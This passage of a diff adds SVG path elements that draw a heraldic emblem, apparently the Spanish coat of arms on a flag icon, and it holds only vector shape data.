0 1.2-1.5h.2z"/>
+  <path fill="#c8b100" d="M332.3 227.6c-3 0-5.8.3-7.8 1l-.4-.2.2-.4c2-.6 4.9-1 8-1s6 .4 8 1c.2 0 .3.2.2.3 0 .2-.2.3-.3.2-2-.6-4.8-1-7.9-1"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M332.3 227.6c-3 0-5.8.3-7.8 1l-.4-.2.2-.4c2-.6 4.9-1 8-1s6 .4 8 1c.2 0 .3.2.2.3 0 .2-.2.3-.3.2-2-.6-4.8-1-7.9-1z"/>
+  <path fill="#fff" d="M329.4 228.7c0-.3.2-.5.4-.5s.5.2.5.5c0 .2-.3.4-.5.4s-.5-.2-.5-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M329.4 228.7c0-.3.2-.5.4-.5s.5.2.5.5c0 .2-.3.4-.5.4s-.5-.2-.5-.4z"/>
+  <path fill="#ad1519" d="M332.4 228.8h-1c-.2 0-.4-.1-.4-.3 0-.1.2-.3.4-.3h2a.3.3 0 0 1 .3.3c0 .2-.1.3-.3.3h-1"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M332.4 228.8h-1c-.2 0-.4-.1-.4-.3 0-.1.2-.3.4-.3h2a.3.3 0 0 1 .3.3c0 .2-.1.3-.3.3h-1"/>
+  <path fill="#058e6e" d="M327.4 229.2h-.7a.3.3 0 0 1-.4-.2.3.3 0 0 1 .3-.3l.7-.1.7-.2c.2 0 .4.1.4.3 0 .2 0 .3-.3.4h-.7"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M327.4 229.2h-.7a.3.3 0 0 1-.4-.2.3.3 0 0 1 .3-.3l.7-.1.7-.2c.2 0 .4.1.4.3 0 .2 0 .3-.3.4h-.7"/>
+  <path fill="#ad1519" d="m324.5 229.7.4-.5.6.1-.4.6-.6-.2"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m324.5 229.7.4-.5.6.1-.4.6-.6-.2"/>
+  <path fill="#fff" d="M334.4 228.7c0-.3.2-.5.5-.5.2 0 .4.2.4.5 0 .2-.2.4-.4.4s-.5-.2-.5-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M334.4 228.7c0-.3.2-.5.5-.5.2 0 .4.2.4.5 0 .2-.2.4-.4.4s-.5-.2-.5-.4z"/>
+  <path fill="#058e6e" d="M337.3 229.2h.7c.2.1.3 0 .4-.2a.3.3 0 0 0-.3-.3l-.7-.1-.7-.2c-.2 0-.4.1-.4.3 0 .2 0 .3.3.4h.7"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M337.3 229.2h.7c.2.1.3 0 .4-.2a.3.3 0 0 0-.3-.3l-.7-.1-.7-.2c-.2 0-.4.1-.4.3 0 .2 0 .3.3.4h.7"/>
+  <path fill="#ad1519" d="m340.1 229.7-.3-.5h-.7l.4.6h.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m340.1 229.7-.3-.5h-.7l.4.6h.6"/>
+  <path fill="#ad1519" d="M332.3 231.6a27.1 27.1 0 0 1-6.4-.7 27.9 27.9 0 0 1 13 0 27.1 27.1 0 0 1-6.6.7"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".3" d="M332.3 231.6a27.1 27.1 0 0 1-6.4-.7 27.9 27.9 0 0 1 13 0 27.1 27.1 0 0 1-6.6.7z"/>
+  <path fill="#c8b100" d="m340.2 226.2-.1-.4c-.2 0-.3 0-.4.2l.1.5c.2 0 .3-.1.4-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m340.2 226.2-.1-.4c-.2 0-.3 0-.4.2l.1.5c.2 0 .3-.1.4-.3z"/>
+  <path fill="#c8b100" d="M335.2 225.2c0-.2 0-.3-.2-.4-.1 0-.3.2-.3.4s0 .3.2.4c.2 0 .3-.2.3-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M335.2 225.2c0-.2 0-.3-.2-.4-.1 0-.3.2-.3.4s0 .3.2.4c.2 0 .3-.2.3-.4z"/>
+  <path fill="#c8b100" d="M329.5 225.2c0-.2 0-.3.2-.4.1 0 .3.2.3.4s0 .3-.2.4c-.2 0-.3-.2-.3-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M329.5 225.2c0-.2 0-.3.2-.4.1 0 .3.2.3.4s0 .3-.2.4c-.2 0-.3-.2-.3-.4z"/>
+  <path fill="#c8b100" d="m324.5 226.2.1-.4c.2 0 .3 0 .4.2l-.1.5c-.2 0-.3-.1-.4-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m324.5 226.2.1-.4c.2 0 .3 0 .4.2l-.1.5c-.2 0-.3-.1-.4-.3z"/>
+  <path fill="#c8b100" d="m332.3 222.4-.8.5.6 1.4.2.2.3-.2.6-1.4-.9-.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m332.3 222.4-.8.5.6 1.4.2.2.3-.2.6-1.4-.9-.5"/>
+  <path fill="#c8b100" d="m330.4 224.5.4.6 1.4-.4.1-.2-.1-.2-1.4-.4-.4.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m330.4 224.5.4.6 1.4-.4.1-.2-.1-.2-1.4-.4-.4.6"/>
+  <path fill="#c8b100" d="m334.3 224.5-.4.6-1.4-.4-.1-.2.1-.2 1.4-.4.4.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m334.3 224.5-.4.6-1.4-.4-.1-.2.1-.2 1.4-.4.4.6"/>
+  <path fill="#c8b100" d="m326.6 223-.7.6 1 1.2.2.1.1-.2.3-1.4-.9-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m326.6 223-.7.6 1 1.2.2.1.1-.2.3-1.4-.9-.3"/>
+  <path fill="#c8b100" d="m325.2 225.3.5.5 1.2-.7.1-.2-.1-.2h-1.5l-.2.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m325.2 225.3.5.5 1.2-.7.1-.2-.1-.2h-1.5l-.2.6"/>
+  <path fill="#c8b100" d="m329 224.6-.3.6-1.4-.1-.2-.2v-.2l1.3-.7.6.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m329 224.6-.3.6-1.4-.1-.2-.2v-.2l1.3-.7.6.6"/>
+  <path fill="#c8b100" d="m323.8 225.5-.1.7-1.5.1h-.2v-.3l1.2-1 .6.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m323.8 225.5-.1.7-1.5.1h-.2v-.3l1.2-1 .6.5"/>
+  <path fill="#c8b100" d="M326.6 225a.5.5 0 0 1 .5-.6.5.5 0 0 1 .5.5.5.5 0 0 1-.5.5.5.5 0 0 1-.5-.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M326.6 225a.5.5 0 0 1 .5-.6.5.5 0 0 1 .5.5.5.5 0 0 1-.5.5.5.5 0 0 1-.5-.5z"/>
+  <path fill="#c8b100" d="m338 223 .8.6-1 1.2-.2.1-.1-.2-.3-1.4.9-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m338 223 .8.6-1 1.2-.2.1-.1-.2-.3-1.4.9-.3"/>
+  <path fill="#c8b100" d="m339.5 225.3-.5.5-1.3-.7v-.2l.1-.2h1.5l.2.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m339.5 225.3-.5.5-1.3-.7v-.2l.1-.2h1.5l.2.6"/>
+  <path fill="#c8b100" d="m335.7 224.6.3.6 1.4-.1.2-.2v-.2l-1.3-.7-.6.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m335.7 224.6.3.6 1.4-.1.2-.2v-.2l-1.3-.7-.6.6"/>
+  <path fill="#c8b100" d="m340.7 225.5.1.7 1.4.1h.3v-.3l-1.2-1-.6.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m340.7 225.5.1.7 1.4.1h.3v-.3l-1.2-1-.6.5"/>
+  <path fill="#c8b100" d="M331.8 224.5c0-.3.3-.5.5-.5s.5.2.5.5c0 .2-.2.4-.5.4a.5.5 0 0 1-.5-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M331.8 224.5c0-.3.3-.5.5-.5s.5.2.5.5c0 .2-.2.4-.5.4a.5.5 0 0 1-.5-.4z"/>
+  <path fill="#c8b100" d="M337.1 225a.5.5 0 0 1 .5-.6c.3 0 .5.2.5.5s-.2.5-.5.5a.5.5 0 0 1-.5-.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M337.1 225a.5.5 0 0 1 .5-.6c.3 0 .5.2.5.5s-.2.5-.5.5a.5.5 0 0 1-.5-.5z"/>
+  <path fill="#c8b100" d="M331.4 219c0-.4.4-.8 1-.8s.9.4.9.9-.4.9-1 .9a1 1 0 0 1-.9-1"/>
+  <path fill="#c8b100" d="M333 218.8v.6h-1.5v-.6h.5v-1.4h-.6v-.6h.6v-.5h.7v.5h.6v.6h-.6v1.4h.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M333 218.8v.6h-1.5v-.6h.5v-1.4h-.6v-.6h.6v-.5h.7v.5h.6v.6h-.6v1.4h.3z"/>
+  <path fill="#c8b100" d="M333.7 218.8v.6H331v-.6h1v-1.4h-.7v-.6h.6v-.5h.7v.5h.6v.6h-.6v1.4h1"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M332.6 218.2a.9.9 0 0 1 .7.9c0 .5-.4.9-1 .9a1 1 0 0 1-.9-1c0-.3.3-.7.7-.8"/>
+  <path fill="#c8b100" d="m321.9 226.3-.7-.8-.7-.3s.3-.3.6-.3l.5.2v-.2s.2 0 .3.4c.2.3 0 .7 0 .7v.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m321.9 226.3-.7-.8-.7-.3s.3-.3.6-.3l.5.2v-.2s.2 0 .3.4c.2.3 0 .7 0 .7v.3z"/>
+  <path fill="#c8b100" d="m321.9 226 .5.1c.2.2.3.4.1.5h-.5c-.2-.2-.2-.4-.1-.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m321.9 226 .5.1c.2.2.3.4.1.5h-.5c-.2-.2-.2-.4-.1-.5z"/>
+  <path fill="#c8b100" d="m342.6 226.3.7-.8.7-.3s-.3-.3-.6-.3a.6.6 0 0 0-.5.2v-.2s-.3 0-.4.4v.7l.1.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m342.6 226.3.7-.8.7-.3s-.3-.3-.6-.3a.6.6 0 0 0-.5.2v-.2s-.3 0-.4.4v.7l.1.3z"/>
+  <path fill="#c8b100" d="m342.6 226-.5.1c-.2.2-.2.4-.1.5.1.2.3.1.5 0 .2-.2.3-.4.1-.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m342.6 226-.5.1c-.2.2-.2.4-.1.5.1.2.3.1.5 0 .2-.2.3-.4.1-.5z"/>
+  <path fill="#c8b100" d="M321 238h22.8v-6h-22.9v6z"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M321 238h22.8v-6h-22.9v6z"/>
+  <path fill="#c8b100" d="M341.4 242a1 1 0 0 0-.4-.1h-17.6c.6-.2 1-.7 1-1.3 0-.6-.5-1.2-1-1.4l.4.1h17.6c-.7.2-1 .7-1 1.3 0 .6.4 1.1 1 1.3"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".4" d="M341.4 242a1 1 0 0 0-.4-.1h-17.6c.6-.2 1-.7 1-1.3 0-.6-.5-1.2-1-1.4l.4.1h17.6c-.7.2-1 .7-1 1.3 0 .6.4 1.1 1 1.3z"/>
+  <path fill="#c8b100" d="M323.9 241.9h17c.6 0 1.1.3 1.1.8 0 .4-.5.8-1 .8h-17.1c-.6 0-1-.4-1-.8 0-.5.4-.8 1-.8"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M323.9 241.9h17c.6 0 1.1.3 1.1.8 0 .4-.5.8-1 .8h-17.1c-.6 0-1-.4-1-.8 0-.5.4-.8 1-.8z"/>
+  <path fill="#c8b100" d="M323.9 238h17c.6 0 1.1.2 1.1.6 0 .4-.5.7-1 .7h-17.1c-.6 0-1.1-.3-1.1-.7 0-.4.5-.7 1-.7"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M323.9 238h17c.6 0 1.1.2 1.1.6 0 .4-.5.7-1 .7h-17.1c-.6 0-1.1-.3-1.1-.7 0-.4.5-.7 1-.7z"/>
+  <path fill="#005bbf" d="M316.4 338.6c1.6 0 3-.3 4-.9a8.9 8.9 0 0 1 4-.8c1.5 0 3 .3 4 .8 1 .6 2.5 1 4 1a8.7 8.7 0 0 0 4-1 9 9 0 0 1 4-.8c1.5 0 2.8.3 3.9.8 1 .6 2.5 1 4 1v2.4a8.9 8.9 0 0 1-4-1 8.8 8.8 0 0 0-4-.8c-1.5 0-2.8.4-3.9.9a8.8 8.8 0 0 1-4 .9 9 9 0 0 1-4-.9 9 9 0 0 0-4-.9c-1.5 0-3 .4-4 .9a8.6 8.6 0 0 1-4 .9v-2.5"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M316.4 338.6c1.6 0 3-.3 4-.9a8.9 8.9 0 0 1 4-.8c1.5 0 3 .3 4 .8 1 .6 2.5 1 4 1a8.7 8.7 0 0 0 4-1 9 9 0 0 1 4-.8c1.5 0 2.8.3 3.9.8 1 .6 2.5 1 4 1v2.4a8.9 8.9 0 0 1-4-1 8.8 8.8 0 0 0-4-.8c-1.5 0-2.8.4-3.9.9a8.8 8.8 0 0 1-4 .9 9 9 0 0 1-4-.9 9 9 0 0 0-4-.9c-1.5 0-3 .4-4 .9a8.6 8.6 0 0 1-4 .9v-2.5z"/>
+  <path fill="#ccc" d="M316.4 341a8.7 8.7 0 0 0 4-.8 8.9 8.9 0 0 1 4-.8c1.5 0 3 .3 4 .8a9 9 0 0 0 4 .9c1.6 0 3-.4 4-1a8.9 8.9 0 0 1 4-.8 8 8 0 0 1 3.9.9 8.9 8.9 0 0 0 4 .9v2.4a8.9 8.9 0 0 1-4-.9 8.6 8.6 0 0 0-4-.8c-1.5 0-2.8.3-3.9.8a8.7 8.7 0 0 1-4 1 8.9 8.9 0 0 1-4-1 9 9 0 0 0-4-.8 8.9 8.9 0 0 0-4 .9 8.6 8.6 0 0 1-4 .9V341"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M316.4 341a8.7 8.7 0 0 0 4-.8 8.9 8.9 0 0 1 4-.8c1.5 0 3 .3 4 .8a9 9 0 0 0 4 .9c1.6 0 3-.4 4-1a8.9 8.9 0 0 1 4-.8 8 8 0 0 1 3.9.9 8.9 8.9 0 0 0 4 .9v2.4a8.9 8.9 0 0 1-4-.9 8.6 8.6 0 0 0-4-.8c-1.5 0-2.8.3-3.9.8a8.7 8.7 0 0 1-4 1 8.9 8.9 0 0 1-4-1 9 9 0 0 0-4-.8 8.9 8.9 0 0 0-4 .9 8.6 8.6 0 0 1-4 .9V341"/>
+  <path fill="#005bbf" d="M316.4 343.6c1.6 0 3-.4 4-1a8.9 8.9 0 0 1 4-.8 9 9 0 0 1 4 .9c1 .5 2.5.9 4 .9 1.6 0 3-.4 4-1a9 9 0 0 1 4-.8c1.5 0 2.8.3 3.9.8 1 .6 2.5 1 4 1v2.4a8.9 8.9 0 0 1-4-.9 8.7 8.7 0 0 0-4-.8 9 9 0 0 0-3.9.8 8.7 8.7 0 0 1-4 1 9 9 0 0 1-4-1 9 9 0 0 0-4-.8c-1.5 0-3 .3-4 .8a8.6 8.6 0 0 1-4 1v-2.6"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M316.4 343.6c1.6 0 3-.4 4-1a8.9 8.9 0 0 1 4-.8 9 9 0 0 1 4 .9c1 .5 2.5.9 4 .9 1.6 0 3-.4 4-1a9 9 0 0 1 4-.8c1.5 0 2.8.3 3.9.8 1 .6 2.5 1 4 1v2.4a8.9 8.9 0 0 1-4-.9 8.7 8.7 0 0 0-4-.8 9 9 0 0 0-3.9.8 8.7 8.7 0 0 1-4 1 9 9 0 0 1-4-1 9 9 0 0 0-4-.8c-1.5 0-3 .3-4 .8a8.6 8.6 0 0 1-4 1v-2.6"/>
+  <path fill="#ccc" d="M316.4 348.5a8.6 8.6 0 0 0 4-1 9 9 0 0 1 4-.7 9 9 0 0 1 4 .8c1 .5 2.5.9 4 .9 1.6 0 3-.4 4-1a9 9 0 0 1 4-.7c1.5 0 2.8.3 3.9.8 1 .5 2.5.9 4 .9V346a8.8 8.8 0 0 1-4-.9 8.8 8.8 0 0 0-4-.8 9 9 0 0 0-3.9.8 8.7 8.7 0 0 1-4 1 9 9 0 0 1-4-1 9 9 0 0 0-4-.8 9 9 0 0 0-4 .8 8.7 8.7 0 0 1-4 1v2.4"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M316.4 348.5a8.6 8.6 0 0 0 4-1 9 9 0 0 1 4-.7 9 9 0 0 1 4 .8c1 .5 2.5.9 4 .9 1.6 0 3-.4 4-1a9 9 0 0 1 4-.7c1.5 0 2.8.3 3.9.8 1 .5 2.5.9 4 .9V346a8.8 8.8 0 0 1-4-.9 8.8 8.8 0 0 0-4-.8 9 9 0 0 0-3.9.8 8.7 8.7 0 0 1-4 1 9 9 0 0 1-4-1 9 9 0 0 0-4-.8 9 9 0 0 0-4 .8 8.7 8.7 0 0 1-4 1v2.4"/>
+  <path fill="#005bbf" d="M316.4 351c1.6 0 3-.4 4-1a8.8 8.8 0 0 1 4-.8 9 9 0 0 1 4 .9c1 .5 2.5.8 4 .8 1.6 0 3-.3 4-.9a9 9 0 0 1 4-.8c1.5 0 2.8.3 3.9.8 1 .6 2.5 1 4 1v-2.5a8.8 8.8 0 0 1-4-1 8.8 8.8 0 0 0-4-.7c-1.5 0-2.8.3-3.9.8a8.8 8.8 0 0 1-4 .9 8.9 8.9 0 0 1-4-.9 9 9 0 0 0-4-.8 8.9 8.9 0 0 0-4 .8 8.7 8.7 0 0 1-4 .9v2.5"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M316.4 351c1.6 0 3-.4 4-1a8.8 8.8 0 0 1 4-.8 9 9 0 0 1 4 .9c1 .5 2.5.8 4 .8 1.6 0 3-.3 4-.9a9 9 0 0 1 4-.8c1.5 0 2.8.3 3.9.8 1 .6 2.5 1 4 1v-2.5a8.8 8.8 0 0 1-4-1 8.8 8.8 0 0 0-4-.7c-1.5 0-2.8.3-3.9.8a8.8 8.8 0 0 1-4 .9 8.9 8.9 0 0 1-4-.9 9 9 0 0 0-4-.8 8.9 8.9 0 0 0-4 .8 8.7 8.7 0 0 1-4 .9v2.5z"/>
+  <path fill="#c8b100" d="m341.4 328.5-.2.6c0 1.5 1.3 2.7 3 2.7h-23.6c1.6 0 2.9-1.2 2.9-2.7a2.8 2.8 0 0 0 0-.6h17.9"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".4" d="m341.4 328.5-.2.6c0 1.5 1.3 2.7 3 2.7h-23.6c1.6 0 2.9-1.2 2.9-2.7a2.8 2.8 0 0 0 0-.6h17.9z"/>
+  <path fill="#c8b100" d="M323.9 327h17c.6 0 1.1.3 1.1.7 0 .5-.5.8-1 .8h-17.1c-.6 0-1-.3-1-.8 0-.4.4-.8 1-.8"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M323.9 327h17c.6 0 1.1.3 1.1.7 0 .5-.5.8-1 .8h-17.1c-.6 0-1-.3-1-.8 0-.4.4-.8 1-.8z"/>
+  <path fill="#c8b100" d="M320.7 337.8H344v-6h-23.4v6z"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M320.7 337.8H344v-6h-23.4v6z"/>
+  <path fill="#ad1519" d="M346 305.8c2.2 1.3 3.8 2.7 3.6 3.4-.2.6-1 1-2 1.8-1.6 1.1-2.6 3.2-1.8 4.1a5.9 5.9 0 0 1 .1-9.3"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M346 305.8c2.2 1.3 3.8 2.7 3.6 3.4-.2.6-1 1-2 1.8-1.6 1.1-2.6 3.2-1.8 4.1a5.9 5.9 0 0 1 .1-9.3z"/>
+  <path fill="#ccc" d="M324 326h16.7v-81.6h-16.6V326z"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M336.2 244.4v81.4m1.8-81.4v81.4m-14 .2h16.7v-81.6h-16.6V326z"/>
+  <path fill="#ad1519" d="M307 275a53 53 0 0 1 25-2.2c9.9 1.7 17.5 5.6 16.9 8.9v.2s3.7-8.4 3.7-8.7c.7-3.6-7.7-8-18.8-9.8a57 57 0 0 0-9.8-.8c-7 0-13.2.9-16.9 2.3v10"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".4" d="M307 275a53 53 0 0 1 25-2.2c9.9 1.7 17.5 5.6 16.9 8.9v.2s3.7-8.4 3.7-8.7c.7-3.6-7.7-8-18.8-9.8a57 57 0 0 0-9.8-.8c-7 0-13.2.9-16.9 2.3v10"/>
+  <path fill="#ad1519" d="M340.8 285.1c4.6-.3 7.7-1.5 8-3.5.4-1.5-1.2-3.2-4-4.7-1.2.1-2.6.3-4 .3v8"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M340.8 285.1c4.6-.3 7.7-1.5 8-3.5.4-1.5-1.2-3.2-4-4.7-1.2.1-2.6.3-4 .3v8"/>
+  <path fill="#ad1519" d="M324 279c-2.8.4-5 1-6 2l-.2.1c-.5 1 2 3.3 6.3 5.8v-8"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M324 279c-2.8.4-5 1-6 2l-.2.1c-.5 1 2 3.3 6.3 5.8v-8"/>
+  <path fill="#ad1519" d="M351.1 300.9c.4-1.3-4-4-10.4-6.3-3-1-5.3-2.1-8.3-3.4-8.8-4-15.4-8.4-14.6-10l.1-.2c-.4.4-1.2 8.4-1.2 8.4-.8 1.5 5.2 6 13.3 9.8 2.6 1.3 8.1 3.3 10.7 4.2 4.7 1.6 9.3 4.7 8.9 5.8l1.5-8.3"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".4" d="M351.1 300.9c.4-1.3-4-4-10.4-6.3-3-1-5.3-2.1-8.3-3.4-8.8-4-15.4-8.4-14.6-10l.1-.2c-.4.4-1.2 8.4-1.2 8.4-.8 1.5 5.2 6 13.3 9.8 2.6 1.3 8.1 3.3 10.7 4.2 4.7 1.6 9.3 4.7 8.9 5.8l1.5-8.3z"/>
+  <path fill="#c8b100" d="M317.5 271.3c.6-2.4 1.4-4.7 2.2-7a5.7 5.7 0 0 1-.5.1 5.4 5.4 0 0 1-.6 0c-.4 1.8-.9 3.4-1.5 5.1l-2.9-4.4-1 .2-1 .1a140 140 0 0 1 4.2 6h1.1m6.3-7H322l-.2 6.5h4.6v-.8a32 32 0 0 1-2.7.1v-5.9m7.3 1.1 2.1.3v-.4l.1-.4-6.2-.5v.8h2.2l-.6 6h1l.8.1.6-5.9m2.5 6.5c.3 0 .6 0 1 .2l.8.2.7-3h.1l.5 1.2 1 2.3c.3 0 .7 0 1 .2l1.1.2-.3-.6-1.5-3.1c1.2 0 2-.4 2.3-1.3.1-.7-.1-1.2-.7-1.6a6 6 0 0 0-1.9-.6l-2.5-.5-1.6 6.4m3.2-5.6c.8.2 1.7.3 1.7 1.1a2 2 0 0 1 0 .5c-.3 1-1 1.3-2.3 1l.6-2.6m8.7 7.6-.3 2.1.9.5.9.5.6-7.4a3.6 3.6 0 0 1-.8-.4l-6.6 4.1.6.3.4.3 1.8-1.4 2.5 1.4zm-1.9-1.7 2.2-1.4-.3 2.4-1.9-1"/>
+  <path fill="none" stroke="#000" stroke-width=".1" d="M230.3 205.3c0-1.2 1-2.1 2.2-2.1 1.3 0 2.3.9 2.3 2 0 1.2-1 2.2-2.3 2.2a2.2 2.2 0 0 1-2.2-2.1z"/>
+  <path fill="#ad1519" stroke="#000" stroke-width=".3" d="M255.3 187.1c6.8 0 13 1 16.8 2.6a32 32 0 0 0 8.6 2.2c2.6.3 5 .4 7 .2 2.9 0 6.9.8 11 2.6a29.2 29.2 0 0 1 8 5l-1.7 1.5-.4 4-4.4 5-2.2 2-5.3 4-2.6.3-.8 2.3-33.7-4-33.8 4-.9-2.3-2.6-.2-5.2-4.2-2.2-1.9-4.4-5-.5-4-1.6-1.5a29.5 29.5 0 0 1 8-5c4-1.8 8-2.6 10.9-2.6 2 .2 4.4.1 7-.2a32 32 0 0 0 8.6-2.2c4-1.6 9.6-2.6 16.4-2.6z"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".4" d="M255.9 231.6c-12.6 0-23.8-1.5-31.9-4-.6 0-.9-.6-.8-1.2a1.2 1.2 0 0 1 .8-1.2 120 120 0 0 1 31.9-4c12.5.1 23.8 1.6 31.8 4 .6.2.9.7.9 1.2 0 .6-.3 1.1-1 1.3a119 119 0 0 1-31.7 4"/>
+  <path fill="#ad1519" d="M255.8 230a121 121 0 0 1-29.3-3.4c7.8-2 18-3.2 29.3-3.2a123 123 0 0 1 29.5 3.2c-7.8 2-18.1 3.4-29.5 3.4"/>
+  <path fill="none" stroke="#000" stroke-width=".1" d="M256.7 230v-6.7m-1.9 6.7v-6.7"/>
+  <path fill="none" stroke="#000" stroke-width=".2" d="M253.1 230v-6.7m-1.7 6.7v-6.7"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M249.9 230v-6.7m-2.9 6.4v-6.2m1.4 6.2v-6.4"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M244.3 229.4v-5.7m1.4 5.9v-6m-5 5.4v-4.9m1.2 5V224m1.2 5.4V224"/>
+  <path fill="none" stroke="#000" stroke-width=".5" d="M239.4 229v-4.8m-1.1 4.6v-4.5"/>
+  <path fill="none" stroke="#000" stroke-width=".6" d="M237 228.7v-4.2m-2.6 3.8V225m1.4 3.5v-3.7"/>
+  <path fill="none" stroke="#000" stroke-width=".7" d="M233.1 228v-2.9m-1.2 2.7v-2.4"/>
+  <path fill="none" stroke="#000" stroke-width=".8" d="M230.6 227.5v-2m-1.4 1.8v-1.4"/>
+  <path fill="none" stroke="#000" stroke-width=".9" d="M227.8 227v-.7"/>
+  <path fill="none" stroke="#000" stroke-width=".1" d="M264 229.7v-6.2m-3.2 6.4v-6.6m-2.2 6.6v-6.6"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".4" d="M255.8 221.3a115 115 0 0 0-32.2 4c.7-.3.6-1-.2-3.2-1-2.6-2.6-2.5-2.6-2.5a130 130 0 0 1 35-4.3c13.8 0 26.2 1.7 35.1 4.3 0 0-1.5-.1-2.5 2.5-.9 2.1-1 3-.3 3.3-8-2.5-19.6-4.1-32.3-4.1"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".4" d="M255.8 215.3a131 131 0 0 0-35 4.3c-.5.2-1.2 0-1.4-.6a1.1 1.1 0 0 1 .8-1.4c8.9-2.7 21.6-4.4 35.6-4.4 14.1 0 26.9 1.7 35.8 4.4.6.2.9.9.7 1.4-.2.6-.8.8-1.4.6-8.9-2.6-21.3-4.2-35-4.3"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".4" d="M255.8 230a121 121 0 0 1-29.3-3.4c7.8-2 18-3.2 29.3-3.2a123 123 0 0 1 29.5 3.2c-7.8 2-18.1 3.4-29.5 3.4z"/>
+  <path fill="#fff" stroke="#000" stroke-width=".4" d="M246 218.5c0-.6.5-1.1 1.1-1.1.7 0 1.2.5 1.2 1 0 .6-.5 1.1-1.2 1.1a1.1 1.1 0 0 1-1-1"/>
+  <path fill="#ad1519" stroke="#000" stroke-width=".4" d="M255.9 219.3h-3.4c-.6 0-1.1-.5-1.1-1 0-.6.5-1.1 1-1.1h6.9a1 1 0 0 1 1.1 1c0 .6-.5 1.1-1.1 1.1h-3.4"/>
+  <path fill="#058e6e" stroke="#000" stroke-width=".4" d="m239 220.2-2.5.3c-.6 0-1.2-.3-1.2-1a1 1 0 0 1 1-1.1l2.4-.3 2.5-.3a1.1 1.1 0 0 1 1.2 1c0 .5-.4 1-1 1.1l-2.5.3"/>
+  <path fill="#fff" stroke="#000" stroke-width=".4" d="M229.1 220.4c0-.5.5-1 1.1-1a1 1 0 0 1 1.2 1c0 .6-.5 1.1-1.2 1.1a1.1 1.1 0 0 1-1-1"/>
+  <path fill="#ad1519" stroke="#000" stroke-width=".4" d="m221.6 222.4 1.3-1.7 3.4.5-2.7 2-2-.8"/>
+  <path fill="#058e6e" stroke="#000" stroke-width=".4" d="m272.8 220.2 2.4.3c.6 0 1.2-.3 1.3-1a1 1 0 0 0-1-1.1l-2.5-.3-2.4-.3c-.7 0-1.2.4-1.3 1 0 .5.4 1 1 1.1l2.5.3"/>
+  <path fill="#fff" stroke="#000" stroke-width=".4" d="M263.4 218.5c0-.6.6-1.1 1.2-1.1s1.1.5 1.1 1c0 .6-.5 1.1-1.1 1.1a1.1 1.1 0 0 1-1.2-1m17 2c0-.6.5-1.1 1-1.1a1 1 0 0 1 1.2 1c0 .6-.5 1.1-1.1 1.1a1.1 1.1 0 0 1-1.1-1"/>
+  <path fill="#ad1519" stroke="#000" stroke-width=".4" d="m290 222.4-1.2-1.7-3.4.5 2.8 2 1.9-.8"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M225.1 227c8-2.3 18.7-3.6 30.7-3.7 12 0 22.9 1.4 30.8 3.7"/>
+  <path fill="#c8b100" d="m230.4 196 1.5 1.1 2.1-3.4a7.9 7.9 0 0 1-3.8-7.6c.2-4.5 5.6-8.1 12.5-8.1 3.5 0 6.7 1 9 2.5l.2-1.9a18.6 18.6 0 0 0-9.2-2.3c-8 0-14.1 4.4-14.4 9.8a9.5 9.5 0 0 0 3.3 8l-1.2 2"/>
